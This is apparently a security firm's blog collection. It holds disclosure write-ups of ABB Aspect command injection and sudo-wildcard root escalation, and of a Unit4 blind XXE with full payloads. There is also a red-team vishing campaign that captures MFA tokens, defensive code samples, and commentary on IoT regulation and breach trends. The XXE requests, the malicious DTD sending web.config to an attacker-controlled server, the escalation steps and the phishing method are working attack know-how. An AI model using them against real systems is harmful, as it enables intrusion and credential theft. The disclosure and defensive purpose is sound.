Privilege Escalation and RCE Vulnerabilities for Multiple ABB Appliances [ASPECT, Matrix, Nexus]. (CVE-2023-0635 / CVE-2023-0636)

Prism Infosec recently identified two high risk vulnerabilities within the ABB Aspect Control Engine affecting versions prior to 3.07.01. The two vulnerabilities discovered could result in remote code execution (RCE), and privilege escalation within ABB’s Aspect Control Engine software. 

Background

During a recent security testing engagement, Prism Infosec discovered an ABB Aspect appliance through traditional enumeration techniques. A Google search revealed that this is a building management control system, and in this instance it was misconfigured to be publicly available on the Internet.

Typically, administrative interfaces should not be externally accessible over the Internet unless absolutely necessary. Where this is unavoidable, they should require a secondary layer of authentication such as VPN access or IP address whitelisting, combined with further controls such as multi-factor authentication (MFA).

Prism Infosec gained initial access to the admin interface by using the default credentials documented in the Aspect Control Engine’s publicly available user manual. 

Exploitation

Following this access, Prism Infosec were able to identify that the Network Diagnostic function of the ASPECT appliance was vulnerable to remote code execution, which allowed us to gain access via a reverse shell to the underlying Linux operating system and the associated internal network infrastructure. 

CVE-2023-0636 – Remote code execution

The vulnerability was possible because the ping host functionality allowed Linux commands to be appended to the IP address.

Because of this, it was possible to host a shell file on Prism Infosec's internal testing server and have the appliance fetch it into the web server's htmlroot directory.

This PHP shell file allowed for remote connectivity to the ASPECT-Enterprise Application’s underlying system.
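Added illustration in Python (not ABB's code) of the hardened shape of a ping-host diagnostic: the target is accepted only as an IP literal or an RFC 1123 hostname, and ping is invoked with an argument list rather than a shell string, so appended text is rejected instead of executed.

```python
import ipaddress
import re
import subprocess

# Vulnerable pattern of the kind the write-up describes (do NOT use): the target
# is spliced into a shell command line, so anything the shell treats as a
# command separator is run as well:
#     os.system("ping -c 3 " + target)

# RFC 1123 hostname: labels of letters, digits and hyphens only, so no character
# that /bin/sh or ping's option parser could misread can get through.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def validate_target(target: str) -> str:
    """Return a canonical IP address or hostname, or raise ValueError."""
    t = target.strip()
    if not t or len(t) > 253:
        raise ValueError("target is empty or too long")
    try:
        return str(ipaddress.ip_address(t))      # IPv4 or IPv6 literal
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(t):
        return t
    raise ValueError(f"rejected target {target!r}")


def is_valid_target(target: str) -> bool:
    """Boolean form of validate_target for callers that only need accept/reject."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_command(target: str, count: int = 3) -> list:
    """argv for the diagnostic: a list, never a shell string, with a bounded count."""
    if not 1 <= count <= 10:
        raise ValueError("count must be between 1 and 10")
    return ["ping", "-c", str(count), "-W", "2", validate_target(target)]


def run_ping(target: str, count: int = 3) -> tuple:
    """Run the diagnostic without a shell; returns (exit status, combined output)."""
    proc = subprocess.run(build_ping_command(target, count),
                          capture_output=True, text=True, timeout=30)
    return proc.returncode, proc.stdout + proc.stderr


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "127.0.0.1; ls", "host-1.example.com"):
        print(f"{candidate!r}: accepted={is_valid_target(candidate)}")
```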

CVE-2023-0635 – Escalating from apache user to root

After further investigation, Prism Infosec identified an unintended privilege escalation vulnerability built into the underlying OS of the ABB appliance, which allowed the user to escalate to a root account.

Once initial access was achieved, a check of the privileges revealed that the software was running as the ‘apache’ user, a relatively low-privileged user with limited functionality. 

Running sudo -l lists the sudo permissions this low-privileged user has; note the /usr/local/aam/bin/* entry at the bottom of the (root) NOPASSWD: section. A script identified within this directory was called copyFile.sh.

Root access achieved

Because any binary in this directory could be run as root without a password, it was possible to copy /bin/bash into it and run sudo /usr/local/aam/bin/bash, which allowed Prism Infosec to escalate to a root account.
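As an added defensive illustration (not ABB's tooling), the audit below parses sudo rules in the form sudo -l prints them and flags wildcard command paths such as the /usr/local/aam/bin/* entry, together with a check of whether the wildcard's directory is writable; the sample rules are constructed.

```python
import os
import re
from dataclasses import dataclass

# Constructed sudoers-style entries in the form sudo -l reports them; the
# /usr/local/aam/bin/* line mirrors the entry described in the write-up.
SAMPLE_SUDOERS = """\
# sample rules (constructed)
apache ALL=(root) NOPASSWD: /usr/bin/systemctl restart httpd
apache ALL=(root) NOPASSWD: /usr/local/aam/bin/*
backup ALL=(root) /usr/bin/rsync
www ALL=(root) NOPASSWD: /opt/tools/*.sh, /usr/bin/tail /var/log/httpd/*
"""

# user  host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class SudoFinding:
    user: str
    command: str
    reason: str


def audit_sudoers(text, is_writable=lambda p: os.access(p, os.W_OK)):
    """Flag rules whose command path contains a wildcard.

    A wildcard lets the rule's user run *any* file matching it as root, so the
    rule is only as strong as the directory's write protection.  is_writable is
    injectable: the default asks the OS as the auditing user, tests pass a fake.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            path = cmd.split()[0] if cmd else ""
            if "*" not in path:
                continue  # a wildcard only in the arguments is a separate case
            reason = "wildcard command path"
            if nopasswd:
                reason += " runnable without a password"
            findings.append(SudoFinding(m.group("user"), cmd, reason))
            parent = os.path.dirname(path)
            if is_writable(parent):
                findings.append(SudoFinding(m.group("user"), cmd,
                                            f"directory {parent} is writable"))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.user}: {f.command}: {f.reason}")
```

On a live host, feed it the output of sudo -l for the service account (here apache) so the writability check runs with that account's permissions.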

The possibilities here are endless for an adversary, from exfiltrating local data, to enumerating and moving laterally through the internal network. 

To summarise, Prism Infosec went from an external IP address open to the internet, to a rooted Linux system, inside an internal network. 

Resolution

Prism Infosec quickly made our client aware of these vulnerabilities and shortly afterwards disclosed the findings to ABB. We were delighted to see both parties quickly acknowledge and act on these issues: the client ensured these levels of access were disabled, and ABB patched the software and released an update and advisory to their clients.

Credits and References

  • CVE-2023-0635 – Privilege escalation to root was discovered by George C
  • CVE-2023-0636 – Remote code execution was discovered by Karolis N

CVE-2023-0635 Privilege escalation to root
The successful attacker can open a shell and escalate access privileges to root.

CVSS v3.1 Base Score: 7.8
CVSS v3.1 Temporal Score: 7.4
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
CVSS Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
NVD Summary Link: https://nvd.nist.gov/vuln/detail/CVE-2023-0635

CVE-2023-0636 Remote code execution
The successful attacker is able to leverage a vulnerable network diagnostic component of the ASPECT interface, to perform Remote Code Execution.

CVSS v3.1 Base Score: 7.2
CVSS v3.1 Temporal Score: 7.0
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C
CVSS Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C
NVD Summary Link: https://nvd.nist.gov/vuln/detail/CVE-2023-0636

Timeline

  • Vulnerabilities discovered during the assessment: [05/10/2022]
  • Vendor Informed: [07/10/2022]
  • First Meeting with ABB and Prism Infosec: [11/10/2022]
  • Final Meeting with ABB and Prism Infosec: [22/05/2023]
  • Vendor Confirmed Fix, and communicated to customers: [01/06/2023]
  • CVE Assigned: [05/06/2023]
  • Prism Infosec Blog Post: [05/06/2023]

How to Protect the Business Against a Data Breach/Ransomware

Threats to the business can come in various forms, but by far the most common and significant is a data breach. Usually leveraged via a successful phishing or spear phishing attack, this then results in either sensitive information (such as a username and/or password) being disclosed or a compromise of target endpoints such as laptops or mobile devices.

Both attack vectors could then see unauthorised remote logins to organisational services or data, which an attacker can then use to exfiltrate sensitive information. This could include personal data (names, addresses, dates of birth, medical data, etc.), banking details, credit card information, or company intellectual property. 

The information will then either be sold (usually at a price per record), used to target other individuals with fraudulent attacks, or be associated with a ransomware situation where either it may then be permanently encrypted and/or released publicly if the attackers do not receive payment within a certain time. Over the last few years, it’s this latter scenario that has come to dominate, as organised criminal gangs become more adept at extorting funds from targets.

Are you prepared?

Yet, despite the wealth of data breaches reported year after year, organisations still fail to prepare for what is rapidly becoming almost inevitable. If the business isn’t ready, it can’t respond effectively or communicate with internal and external stakeholders such as customers and clients, the C-suite and third-party organisations such as the ICO. This results in a loss of confidence and unwanted publicity, as well as the organisation spending unnecessary time resolving incidents and the potential financial loss of paying the ransom. 

To protect themselves from such attacks, organisations should implement a variety of defences. It’s important to deliver regular security awareness programs to staff, warning of the risk of clicking on unknown links or opening files or attachments, for instance, but these need to be regularly scheduled and be appropriate. The most effective security awareness briefings will be relatively succinct and interesting to staff, for example by containing relevant and interesting examples of the potential impacts, rather than being a lecture.

With regard to technical security controls, the business should implement endpoint and cloud-based protection which can protect against known and new attacks, as well as monitoring and alerting systems to facilitate rapid identification and reporting of any potential attempts and actual breaches within the business environment. Also, put in place strong endpoint configuration that limits the privileges of users, restricts the execution of unknown and untrusted applications and reduces the attack surface through removal of unnecessary functionality (command prompts, PowerShell, default bundled software, etc.). 

Locking down data is essential so ensure that data storage is resilient to unauthorised attempts to modify files, using techniques such as inherent versioning and/or offline data snapshots and backups. Remain vigilant through the implementation of monitoring and alerting mechanisms across server, endpoint and cloud environments and keep things fresh through regular security reviews of device endpoints and data storage and applications to test their resilience to ransomware attacks. 

If the worst does happen, you’ll want to rely on an effective incident response plan being in place as well as team preparedness, having conducted scenario-based penetration testing (“red team”) attack simulations as well as desktop simulated breach exercises to ensure that the security teams know how to handle breaches quickly and effectively.

Policy and process

However, it cannot be overstated how important it is to have a reasonable and applicable (to the business) set of security policies, procedures and plans to support information security and to govern user behaviour. 

An overarching information security policy should put security centre stage and reveal the management commitment to it as well as prescribing a framework of other documents such as an acceptable use policy, incident response plan, access control and data handling policies. Many organisations are now already aligned or certified to standards such as ISO27001, which provides a framework for management of an information security management system (ISMS). 

Be Proactive

Finally, be proactive. Regularly review the data that is being collected and stored by the organisation, whether on-premise or in the cloud, assess its importance to the business and ensure that there are suitable controls in place to protect it from exposures and loss. Ensure that offline backups, snapshots, and/or data versioning exist and consider the impact of data being deleted, encrypted or leaked. Regularly advise your staff on existing and new cyber security threats, and consider future and evolving attacks such as voice/messaging attacks, as detection of email based phishing attacks forces attackers to seek alternative avenues.

CVE-2022-34001 – XML External Entity (XXE) in Unit 4 ERP 7.9 (Also Known As “Agresso”)

Prism Infosec identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software. This has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.

Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.

CVE-2022-34001 – Proof of Concept

The ERP API supported the use of SOAP calls; curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body. To test for XXE, Prism Infosec used a simple HTTP outbound call to a Burp Collaborator server to confirm that the XML allowed entity expansion and also accepted the SYSTEM keyword. 

The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within the <Xml> tags:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com"> %dtd;]><xxx/>]]>
</Xml>
</input>
<credentials>
…[REDACTED]…
</credentials>

This resulted in an HTTP request to the Prism Infosec controlled server:

The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC.

GET / HTTP/1.1
Host: burp_collaborator.com
Connection: Keep-Alive

This confirms that entity expansion was enabled, along with the ability to use protocols such as HTTP and FILE. As the SOAP request only responded with an error message, this attack was considered ‘blind’, so out-of-band techniques were required to exfiltrate data from the host. 

On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):

<!ENTITY % start "<[CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config">
<!ENTITY % goout "<!ENTITY &#37; pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile;
%end;
'>">

The SOAP call was then initiated again, this time referencing the malicious DTD along with the parameter entities needed to exfiltrate the data:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[
<!DOCTYPE doc[
<!ENTITY % dtd SYSTEM "http://attacker_controlled_server:8000/test.xml">
%dtd;
%goout;
%pop;
]>
]]>

</Xml>
</input>
--[Cut]--

On the attacker-controlled server, a listener was set up to serve the malicious DTD and also catch the contents of the file being read:

Serving HTTP on 0.0.0.0 port 8000 ...
api-services_ip - - [02/Mar/2022 12:54:16] "GET /test.xml HTTP/1.1" 200 -
api-services_ip - - [02/Mar/2022 12:54:04] "GET /%3C[CDATA[%0D%0A%3C!--%0D%0A%20%20For%20more%20information%20on%20how%20to%20configure%20your%20ASP.NET%20application,%20please%20visit%20%0D%0A%20%20http://go.microsoft.com/fwlink/?LinkId=301879%0D%0A%20%20--%3E%0D%0A%3Cconfiguration%3E%0D%0A%20%20%3CconfigSections

--[Cut]--

The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:

/<[CDATA[
<!--
  For more information on how to configure your ASP.NET application, please visit 
  http://go.microsoft.com/fwlink/?LinkId=301879
  -->
<configuration>
  <configSections>
    <section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" />
  </configSections>
--[Cut]--

The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls within the internal network, mapping out the internal network and making arbitrary requests to internal hosts. 
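Added Python illustration (not Unit4's own .NET code) of the defensive side of this finding: the CDATA-wrapped inner document carried in the SOAP call's <Xml> element is parsed with DTD processing refused outright, so the DOCTYPE-based probe shown above is rejected before any entity is declared. The SOAP body shape and the ABWImport element name in the benign sample are constructed.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE, the vehicle for every XXE/DTD attack."""


def parse_untrusted_xml(data: str) -> ET.Element:
    """Parse XML from an untrusted caller with DTD processing refused.

    Pass 1 walks the text with expat and aborts on any <!DOCTYPE ...>, so internal
    or external entity declarations are never even read; parameter-entity parsing
    is switched off as well.  Pass 2 builds the tree from the vetted text.
    """
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE '{name}' refused (sysid={sysid!r})")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(data, True)
    return ET.fromstring(data)


def classify_import(soap_body: str) -> str:
    """Vet an ExecuteServerProcessAsynchronously body whose <Xml> element wraps an
    inner document in CDATA.  Returns 'accepted:<root tag>' or 'rejected:<reason>'."""
    try:
        envelope = parse_untrusted_xml(soap_body)
        xml_el = envelope.find(".//{*}Xml")          # any namespace
        if xml_el is None or not (xml_el.text or "").strip():
            return "rejected:missing Xml element"
        inner = parse_untrusted_xml(xml_el.text.strip())
        return f"accepted:{inner.tag}"
    except UnsafeXML as e:
        return f"rejected:{e}"
    except (ET.ParseError, expat.ExpatError) as e:
        return f"rejected:malformed ({e})"


def soap_import(inner_xml: str) -> str:
    """Constructed request body in the shape of the write-up's SOAP call."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml><![CDATA[{inner_xml}]]></Xml>
</input>
</ExecuteServerProcessAsynchronously>
</soap:Body>
</soap:Envelope>"""


# Constructed benign import, and the blind-XXE probe from the write-up.
BENIGN_IMPORT = "<ABWImport><Row><Account>1000</Account></Row></ABWImport>"
XXE_PROBE = ('<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com">'
             ' %dtd;]><xxx/>')

if __name__ == "__main__":
    print(classify_import(soap_import(BENIGN_IMPORT)))
    print(classify_import(soap_import(XXE_PROBE)))
```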

Prism Infosec contacted the vendor (Unit 4) and supplied all the necessary information so that Unit 4 could confirm and subsequently remediate the vulnerability. Unit 4 responded in a timely manner and started working on a fix for all customers. 

Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected. 

Note: Prism Infosec did not confirm whether the vulnerability had been patched; no further testing was conducted after the initial engagement. 

Timeline – CVE-2022-34001

  • Discovered by Prism Infosec during an engagement for client: March 1st 2022
  • Vendor Informed: March 17th 2022
  • CVE Assigned: June 19th 2022
  • Vendor Confirmed Fix, and communicated to customers: July 7th 2022 
  • Prism Infosec Blog Post: July 19th 2022

This vulnerability was discovered and written up by Alexis Vanden Eijnde of Prism Infosec.

What is the PSTI and will it improve IoT security?

By Phil Robinson

The new Product Security and Telecommunications Infrastructure (PSTI) Bill currently going through parliament comprises two parts. The first aims to put in place safeguards to regulate the secure design of the Internet of Things (IoT) while the second will ensure broadband and 5G networks are gigabit-grade. It’s the first part that has caused a stir because it will, for the first time, see the introduction of enforceable regulation. 

Applicable to consumer products such as smartphones, connected cameras, TVs and speakers, fitness trackers, toys, white goods such as smart washing machines and fridges and home equipment such as smoke detectors and door locks, home automation and alarm systems, the regulations stipulate that manufacturers must:

  • Not use default passwords
  • Have a vulnerability disclosure policy
  • Be open about the length of time the product will be supported with security updates

Yet, while the move to regulate the IoT is regarded as long overdue, the PSTI has been criticised for not going far enough, particularly given the number of well-documented security vulnerabilities exhibited by smart technology.

Why is the IoT so insecure?

The root cause of the majority of issues that have plagued consumer hardware is that manufacturers are cost driven and aim to be quick to market, and in many cases this has led to shortcuts or a complete lack of information security during the design process. This has resulted in common security weaknesses long since addressed in more mature software and hardware products, such as default usernames and passwords or straightforward password bypasses, weak encryption (hashes) for password storage, and a lack of encryption for administrative traffic transferred across open networks, being widely found in the IoT. 

In addition, the sector has suffered from other issues, such as a lack of security around firmware update processes (for example a lack of signing) and hardware interface exposures that allow straightforward access to low-level functions of the device or its components (such as memory). And whereas it was hoped the sector would self-regulate, this doesn’t seem to have happened: a report by the Internet of Things Security Foundation in 2020 found that only 1 in 5 manufacturers had a disclosure process, meaning the majority could not be alerted to a security vulnerability.

Where does the PSTI fall short?

The bill currently addresses the most significant and easily exploitable weakness in IoT devices, the use of default passwords; however, many other common security weaknesses have not been covered at this stage. That said, the use of default passwords is by far the most common way that an IoT device will be compromised, and addressing it is a significant first step in improving the security of these products. 

Focusing on default settings also makes it easy to establish whether the manufacturer is in breach of the bill, whereas other measures (such as ensuring a stringent code review process to identify access control bypasses or input validation weaknesses) will not be so straightforward to ascertain. 

The bill also does not stipulate a minimum support period for security updates for consumers, so manufacturers can still release products without a commitment to supporting them, leaving this decision in the hands of consumers who may not necessarily understand the risks.

Understandably perhaps, it is not being applied retroactively, so it won’t apply to the army of devices currently out there, and while manufacturers must have a disclosure channel, there is no compulsion or timeframe for them to notify their users of any reported vulnerability. Nor is there any focus on patch management: users often find patches difficult to apply, so some move towards over-the-air or automated patching would have been welcome.

As mentioned above, there are many other vulnerabilities that can be used to exploit IoT devices, including disrupting administrative traffic, identifying and exploiting flaws in web or file transfer services running on the device, causing denial of service, interfering with the update process and deploying rogue firmware or exploiting the devices with physical access. 

So is the PSTI too little too late?

The PSTI is still winding its way through parliament and is unlikely to pass into law until 2023, but when it does it will mark an important first step in the regulation of an industry that has previously been seen as playing fast and loose. It will force IoT product vendors around the world to consider the security associated with their consumer devices and will provide a baseline of protection for devices being sold to the public in the UK. And it will also see offending vendors held to account for the first time if they do not abide by the articles of this law. 

It’s important to remember that while the bill doesn’t cover as many of the security issues as one might have hoped, it does cover the vulnerability with the highest likelihood and impact of exploitation. Other key requirements such as ensuring a vulnerability disclosure policy and ensuring transparent advice on the time that security updates will be released are also welcome measures and support the improvement of product security over time.

Knowing how long a product will be supported will help consumers make an informed decision and is likely to be used by consumer support organisations such as Which? to differentiate offerings. In many ways, it sets a bar by which vendors can be measured and could lead to the emergence of consumer kitemarks, so that security becomes not a sunk cost but a differentiating factor that manufacturers can use to boost sales.

IoT devices do, of course, also impact the corporate environment either because users seek to use these on the network or by acting as potential conduits for an attack, such as ransomware or the large scale DDoS attacks we saw carried out by the Mirai botnet that enslaved thousands of IoT devices. Consequently, the PSTI will affect businesses too and, depending on how the regulation evolves, it could even have a direct impact on security team workloads, particularly if it seeks to address patch management in the future.

Let’s Go Phishing

Kian J recounts a recent simulated phishing engagement delivered to a major financial organisation

We recently completed a project for a major financial organisation which saw us deliver a red team engagement covering three scenarios. The first involved a simulated phishing attack and we thought it worth sharing the procedures used by our consultants to gain complete, persistent, unauthorised access to the company’s internal network.

Before we embarked upon the exercise, we needed to assess the requirements of the phishing campaign and pick a campaign profile that was a best fit for the use case. Examples of possible attacks included:

  • Email Phishing
  • URL/HTTPs Phishing
  • Spear Phishing
  • Whale Phishing
  • Vishing
  • Smishing
  • Angler Phishing
  • Pharming
  • Clone Phishing

Note: this is not a complete list of attacks, but only a handful that would be considered in a remote phishing engagement.

Due to the engagement requirements, we had decided that the best approach would be a multi-pronged campaign, consisting of vishing, email phishing and URL phishing.

Initially, we used email, however, it quickly became apparent that users had been trained in this area, resulting in burnt accounts which we were able to diagnose due to a high bounce back rate on our emails. Despite running the assault over a couple of days with various attack vectors, it all led to the same result – with our account or domain being blacklisted.

At this stage the natural conclusion would have been to assume that the staff had received adequate training in phishing engagements. However, we decided to give it one last shot using a vishing campaign conducted using URL phishing.

We continued with our OSINT efforts, specifically scraping phone numbers from various sites such as rocketreach.io and lusha.com to put together a new target list. Ideally, we wanted this new list to consist of higher value targets such as developers or technical leadership roles. The purpose of this was that once we landed in the environment, we would hopefully have more privileges enabling us to escalate access. This resulted in a target list consisting of 31 phone numbers.

The next step we needed to take was to get the staff to either visit a malicious site or to give us their username, password, and MFA token over the phone. We figured the first solution would have a better outcome (this is where the URL phishing comes into play). So, we went through the endpoints we had access to and decided that we would clone a Citrix site, and had created the following page:

[Screenshot: Citrix Gateway Login Screen]

The page, after submitting credentials would then ask for a MFA token:

[Screenshot: Login Requesting an MFA Token Value]

Great, now we had a target list and a malicious site (hosted in AWS to bypass any proxy filtering) and so were primed and ready to begin the vishing attack. 

On our first call we managed to get a hold of someone I will refer to as “Mark”. We then ran through a simple script with him, explaining that we were swapping over Citrix environments and needed to test the database changeover had worked.

Mark was a great help throughout the assessment, but specifically on this call, he gave us a vital piece of information; the Citrix authentication was being handled by Microsoft single-sign-on (SSO) and that the page wasn’t sending him the SMS. We quickly got another consultant on the case to process the request (by submitting the credentials into their legitimate site) which would then force the SMS process to kick off.

We then called Mark back and, as we were already friendly with him, went through the same process. Mark then submitted the newly generated MFA token, an example of the output of which can be seen here:

[Screenshot: Receiving the Credentials from our Target]

Mark was then forwarded straight to their legitimate landing page, and it appeared as though sign-in was successful; this was caused by their time-out periods being overly long.

Perfect! So now we had Mark’s username, password, and an MFA token, but if we wanted to access the Citrix environment consistently, we would need multiple tokens. As it worked out, we had an easy solution to bypass this: the Microsoft Authentication application. We proceeded to log in to the app with Mark’s details:

[Screenshot: Microsoft Authenticator App]

This then reflected on the website, adding two new options to the user:

[Screenshot: The login then allowed use of the Authenticator]

The two new options, “Approve a request on my Microsoft Authentication app” and “Use a verification code from my mobile app”, were now the only indicators that the user had been compromised; however, this did not lead to the campaign being discovered.

Finally, after a week of attempts, we had established a means of gaining complete, persistent, unauthorised access to the company’s internal network. From this point, we were then able to compromise another two accounts, totalling three, before we decided that it was no longer going to provide us with an advantage and disclosed to the client.

In conclusion, we think there are two key recommendations not just for the company concerned but for anyone else who thinks they’ve covered the bases when it comes to phishing attacks. Firstly, we would advise that staff are trained in different forms of phishing attacks, such as email attacks and vocal attacks. Staff can quickly let their guard down when different channels are used. Secondly, we would also advise that any unmanaged devices are blocked, or at least have heavy restrictions placed upon them.

If you’d like to talk to us about how we can help test your resilience to a phishing attack, do contact us at contact@prisminfosec.com or call us on 01242 652 100.

ICO data reveals sharp rise in attacks

Recent data from the Information Commissioner’s Office (ICO) Data Security Trends Analysis Q1 2021-22 (capturing incidents for the period 1 April – 30 June 2021) reveal there’s been a sharp rise in specific cyber attacks as attackers seek to capitalise on the disruption caused by the pandemic and working from home (WFH).

The biggest leap was in misconfigurations of software and hardware, up a staggering 543% from 7 incidents last year to 45. This reflects the rapid expansion within the cloud as businesses sought to roll-out remote working to enable WFH. Misconfigurations routinely top the list of cloud security issues due to a failure to configure cloud solutions. Left in their default settings, these systems become much easier to compromise when exploits then surface. 

There was also a marked increase in attacks against the user. Malware was up a third and phishing attacks were up 54% compared to the same time last year while ransomware more than doubled due to the growth of Ransomware-as-a-Service (RaaS). RaaS enables cyber criminals to use malware for extortion without the need to code it themselves and was responsible for two thirds of all campaigns during 2020. 

This year the ICO also included cryptographic flaws and denial of service attacks, which were omitted last year, indicating a growth in highly targeted organised attacks. The only attack type to buck the trend was unauthorised access, which fell 28% from 87 to 63, but this could equally be due to the difficulty of detecting such an attack outside the corporate network.

The results show that many users have fallen victim to attack while WFH, let down by insufficient support and a failure to implement secure remote access. Staff training should have helped prevent phishing attacks, for instance, with virtual training sessions offered to help with reinforcement. The increase in malware also suggests inadequate protection of endpoints, no doubt caused by many relying on connecting from home on personal devices. 

[Chart: Attack Trends 2020 – 2021]

The ICO also helpfully breaks down these figures into specific sectors, and virtually all of them have seen an increase in incidents. The retail and manufacturing industries continue to suffer the highest volume of attacks but saw a relatively modest increase of 48% compared to some of the others. 

Perhaps not surprisingly given the disruption to normal working practices, it was the General Business sector that saw the greatest rise at 282%, closely followed by the Utilities sector at 250% and the Health sector at 238%. The Legal sector and Transport and Leisure both saw a tail-off in demand for their services during the pandemic but an uptick following the easing of lockdown, resulting in attacks increasing by 117% and 106%, respectively.

A sector that was relatively unscathed by the pandemic and able to maintain BAU was Online Technology and Telecoms. It saw an increase of only 14%, revealing that it was better able to defend its operations. Similarly, the Finance sector saw only a 2% increase and Local Government 6% while those operating in Social Care actually saw an 11% decrease in attacks.

[Chart: Attacks by Sector 2020 – 2021]

The results of the Data Security Trends Analysis 2021-22 suggest that many organisations struggled to put in place adequate security measures and adapt quickly enough to meet the demands for WFH. This then made it difficult to enforce security policies, leaving staff exposed. 

The question that now remains is how effectively these sectors can play catch-up. Given that we will have a hybrid workforce for the foreseeable future, it’s vital that organisations now identify where their security gaps lie. Most sectors have some work to do to better protect their infrastructure, data and staff.  

Our recommendations are to:

  • Focus on your users by improving identity and access management. Provide remote staff training so that they know how to connect securely. Use refresher training to remind staff of best practice for password management and how to avoid phishing and malware attacks.
  • Examine how you monitor remote devices and BYOD. Many security solutions are not designed to monitor endpoint devices and third-party connections so you may need to re-evaluate how you carry out remote network monitoring.
  • Address cloud security as a priority, particularly the configuration of cloud solutions, and ensure that you lock these down to the minimum permissions and exposure each workload actually requires.
  • Put in place controls to thwart brute force attempts: enforce 2FA, rate-limit logins, lock accounts after repeated failed login attempts and prevent direct root or administrator logins.
  • Adjust your Incident Response to ensure everyone knows what to do in the event of an attack. Check your Disaster Recovery plans to ensure you have back-ups and can perform effective remediation.

If you’d like some advice on how to make your business more resilient and your staff more secure, or if you’d like to assess how effective your current security measures are, we’re here to help. Email us at contact@prisminfosec.com or call 01242 652 100.

Threats and priorities for 2022

Phil Robinson, December 23rd 2021

Many businesses will still be grappling with the seismic shifts of the pandemic as they eye 2022. The rush to roll-out systems to support home working and to activate virtual versions of real-world business channels saw unprecedented digital transformation equivalent to years achieved in just a few months. But this rapid expansion came at a cost, leaving systems and networks overly exposed. 

We’re already seeing the manifestation of more attacks, with the World Economic Forum reporting a 50.1% increase in cyber attacks due to the pandemic with 30,000 related to COVID-19 as well as huge spikes in phishing and ransomware. This has caused many organisations to task their security teams with retroactively fixing any security gaps.

Our top three issues to address going into 2022 and beyond include:

  1. Cloud misconfiguration

